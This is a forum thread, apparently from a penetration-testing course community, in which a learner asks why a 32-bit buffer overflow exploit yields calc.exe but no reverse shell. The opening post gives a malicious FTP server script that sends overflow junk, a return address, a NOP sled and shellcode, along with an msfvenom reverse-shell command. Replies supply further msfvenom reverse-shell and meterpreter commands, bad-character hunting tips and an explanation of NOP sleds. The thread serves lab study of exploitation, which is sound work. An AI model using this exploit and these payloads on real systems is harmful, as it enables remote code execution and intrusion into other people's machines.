Hi All,
I was able to pop calc.exe on 32bit buffer overflow but i cant get a reverse shell. Can anyone help?
msf:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.203.128 LPORT=4444 -f python --var-name payload EXITFUNC=thread -b "\x00"
Python Script:
#!/usr/bin/python
import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("0.0.0.0", 21))
sock.listen(1)
print "[+] Listening to on FTP 21"
c, addr = sock.accept()
print "[+] Connection accepted from: %s" % (addr[0])
buffer = "A" * 989
buffer += "\xb9\xc2\xcc\x75"
buffer += "\x90" *32
payload = ""
payload += b"\xbf\xfa\x6f\x7e\xe9\xd9\xcc\xd9\x74\x24\xf4\x5d"
payload += b"\x2b\xc9\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x87"
buffer += payload
c.send("220 " + buffer + "\r\n")
c.recv(1024)
c.close
print("[+] Client exploited !! ")
sock.close()
Original post by Clarence
You are using a python version to get a reverse shell… are you sure you can use a python?
I would try something like this:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Is your listener correct?
Original reply by StefanWAustin
I’m assuming you’ve corrected your buffer and payload as they are two (duplicate) instances of adding junk bytes, jump command and shellcode (you’ve done the whole thing twice)
This here:
Buffer=…
buffer= …
buffer=…
Payload=…
Payload=…
Payload+=buffer
you just need one line for junk bytes, one for the JMP, and one for shellcode. With each new line use += as this adds onto the end of the string.
Payload += 7
is the equivalent of
Payload = payload + 7
================================
Also the msfvenom payload should just be shellcode, not with an executable output… also assuming you’ve got that straightened out because you mentioned you’ve got calc.exe running, however I’ll put this up anyway
That’s just msfvenom -p windows/shell_reverse_tcp LHOST=… LPORT=… -f c -b “/x00”
-f c is to generate shellcode in C
-f exe is to format as exe
-b “/x00” is to identify bad characters, /x00 by default is no good. You may need to add more. If i recall correctly what you do is google bad characters pypi.org and copy their list of badchars, and add these to your junk bytes. Review the stack to look for any missing numbers/letters in the sequence of 0-9 and A-Z that will be written to the stack as a result of a buffer overflow
I.E. identify a missing number/letter and append it to the badchars command i.e “/x00/xAF” etc
Original reply by m1ck3yb33
hey mate,
i had the same problem. I followed this post and things cleared up:
https://community.ine.com/t/32bitftp-bad-chars/374/3
also add a NOP sled to the start of your shellcode:
“\x90\x90\x90\x90\x90\x90\x90\x90”
Original reply by m1ck3yb33
Hi All
Why do we need to add the NOP ?
Why It cannot execute our shellcode directly without adding NOP ?
Original reply by luisqp66
The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.
So you don’t need to add it always, but if you think your code should work, adding few NOPs just to be sure is the least you can do.
Original reply by jahoda.radek